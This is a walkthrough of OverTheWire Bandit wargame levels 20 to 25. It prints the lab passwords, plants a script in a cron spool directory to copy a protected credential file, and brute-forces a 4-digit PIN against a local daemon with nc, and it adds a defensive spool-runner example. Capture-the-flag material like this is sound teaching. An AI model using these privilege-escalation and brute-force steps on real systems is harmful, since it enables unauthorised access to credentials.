
Bandit Overthewire wargames walkthrough level 21 – 25

Bandit is a game for beginners in Linux and Bash, and a great guide for learning the command line and Linux. We continue with the game here; links to the other levels follow.

Bandit overthewire wargames level 16 – 20

Bandit overthewire wargames level 26 – 30

Level 21→25

  • Host: bandit.labs.overthewire.org
  • port: 2220

bandit level 20 → 21

As instructed, the password for the next level is retrieved by the following steps. There is a binary in the home directory that connects to a port we specify. After connecting to the port, it reads a line and compares it with the password of the bandit20 level. If the password of bandit20 is correct, it returns the password of the bandit21 level. So we use the echo command to pipe the password of bandit20 into the ‘nc’ command with the -l flag for listening mode, and we use the ‘&’ sign to put this running process in the background. Then we execute the binary with the specified port to get the password.

  • echo GbKksEFF4yrVs6il55v6gwY5aVje5f0j | nc -l localhost -p 2000 &
  • ./suconnect 2000

bandit level 21 → 22

In this level we are told to look for cron jobs in the directory /etc/cron.d/. Cron jobs are scheduled jobs in Linux that run automatically after a time interval. In the /etc/cron.d/ directory there is a cron job for bandit22, which we explore because we are looking for the password of bandit22. We use the cat command and see that it runs a bash script located at /usr/bin/cronjob_bandit22.sh. After that, we use the cat command again to see the contents of the bash script. The script has three lines. The first line is the shebang line, which names the interpreter that will run the script. The second line changes the permission of a file to 644, which makes it readable by everybody. The third line reads the password of bandit22 and writes it to that file using the stdout redirection operator. In conclusion, the password of bandit22 is saved in that file.

  • cd /etc/cron.d/
  • ls
  • less cronjob_bandit22
  • cat /usr/bin/cronjob_bandit22.sh
  • cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit level 22 → 23

As instructed, we look in the /etc/cron.d/ directory to see what is executed. We go to the directory /etc/cron.d/ and list its contents using the ls command. We explore the cronjob_bandit23 file because we are looking for the password of bandit23. It runs a bash script located at /usr/bin/cronjob_bandit23.sh.

After that, we use the cat command to read the file. It is a bash script that saves the password of bandit23 in a file in the /tmp directory, but we have to work out the filename to get it. The script uses the whoami command and puts that value in ‘echo I am user $myname’. Therefore we know it is for user bandit23, so the output will be ‘I am user bandit23’. To get the filename, we simply run the script's target command with $myname replaced by bandit23. In the end, we get the filename and use the cat command to get the password of the next level.

  • cd /etc/cron.d/
  • ls
  • cat cronjob_bandit23
  • cat /usr/bin/cronjob_bandit23.sh
  • echo I am user bandit23 | md5sum | cut -d ' ' -f 1
  • cat /tmp/8ca319486bfbbc3663ea0fbe81326349

bandit level 23 → 24

It is a cron job task. We look in the /etc/cron.d/ directory and explore the cronjob_bandit24 file, as we are looking for the password of bandit24. We see that it runs the file ‘/usr/bin/cronjob_bandit24.sh’. Using the cat command, we see that this script runs all the scripts in the /var/spool/bandit24 directory and deletes them after the execution is done. For this task, we will write a script.

  • cd /etc/cron.d/
  • ls
  • cat /usr/bin/cronjob_bandit24.sh

But first we create a directory in the /tmp folder; you can give it any name. Then we use the vim editor (vim is a command-line text editor on Unix-based operating systems) to create the script, with a name of our choice; here I used script.sh.

  • mkdir /tmp/cron
  • cd /tmp/cron
  • vim script.sh

We write our script. It has two lines. The first is the shebang line naming the interpreter that will run the script, which in our case is bash. The second line is a command that copies the contents of /etc/bandit_pass/bandit24 to /tmp/cron/pass.txt, since /tmp/cron is the directory where we will create our file.

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/cron/pass.txt

Next we change the permissions of the files. First we create the pass.txt file in the cron directory using the ‘touch’ command. Then we change the permissions of script.sh to make it executable by everybody, and the permissions of pass.txt to make it readable and writable by everybody. After that we copy script.sh into the /var/spool/bandit24 directory and wait for the cron job to execute it. In the end the password is in pass.txt, and we use the cat command to read it.

  • touch pass.txt
  • chmod 777 script.sh
  • chmod 666 pass.txt
  • cp script.sh /var/spool/bandit24
  • cat pass.txt
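
The level works because the job described above executes whatever file appears in the spool directory. As an added example (not code from this walkthrough or from the wargame), here is a runner that checks ownership and permissions before executing anything; `run_spool`, its arguments and the temporary paths in `demo` are hypothetical names.

```bash
#!/bin/bash
# Added example, not the wargame's own cron script. run_spool, its arguments
# and the temporary paths in demo() are hypothetical names.

# run_spool DIR ALLOWED_UID
# Executes a spooled file only if it is a regular file (not a symlink), is
# owned by ALLOWED_UID, and is not writable by group or others.
# Prints "RUN <file>" or "SKIP <file>"; every entry is deleted afterwards.
run_spool() {
  dir=$1
  allowed_uid=$2
  for f in "$dir"/*; do
    # An unmatched glob stays literal, so skip it when the directory is empty.
    [ -e "$f" ] || [ -L "$f" ] || continue
    if [ -f "$f" ] && [ ! -L "$f" ] &&
       [ -n "$(find "$f" -maxdepth 0 -user "$allowed_uid" \
                 ! -perm -020 ! -perm -002)" ]; then
      echo "RUN $f"
      # Run through sh so the demo does not depend on the exec bit.
      sh "$f" >/dev/null 2>&1 || true
    else
      echo "SKIP $f"
    fi
    rm -f -- "$f"
  done
}

# Constructed demo: one spooled job, checked against two allowed owners.
demo() {
  spool=$(mktemp -d)
  out=$(mktemp -d)
  for uid in "$(( $(id -u) + 1 ))" "$(id -u)"; do
    printf '#!/bin/sh\necho ran > "%s/marker"\n' "$out" > "$spool/job.sh"
    chmod 700 "$spool/job.sh"
    run_spool "$spool" "$uid"
    if [ -e "$out/marker" ]; then echo "  job executed"; else echo "  job did not execute"; fi
    rm -f "$out/marker"
  done
  rm -rf "$spool" "$out"
}
demo
```

The first pass skips the job because its owner is not the allowed account; the second runs it. In both cases the file is removed from the spool.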

bandit level 24 → 25

In this level, we brute-force a daemon process running on port 30002. This process takes the password of bandit24 and a 4-digit pin code, but we don't know the pin code. Therefore we write a bash script that brute-forces it and gives us the password. First we make a directory in the /tmp folder. Then we create a bash script using the vim command-line editor.

  • mkdir /tmp/bruteforc
  • cd /tmp/bruteforc
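  • vim bruteforce.sh

#!/bin/bash

# Password of bandit24, sent with every candidate pin
password="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

# Write one "password pin" line for each pin from 0000 to 9999
for i in {0000..9999}
do
  echo "$password $i" >> pass.txt
done

# Send all lines over one connection and save the responses
cat pass.txt | nc localhost 30002 >> passwd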

After writing the bash script we change its permission so that we can execute it, using the chmod command, and then execute the script. The password is in the passwd file, but the file also contains lots of failed attempts. So we use the uniq command to get the unique strings from the file. For the uniq command to work, the file must be sorted, so we use the sort command to sort the file and then pipe the result to the uniq command.

  • ./bruteforce.sh
  • sort passwd | uniq -u

Command we learned.
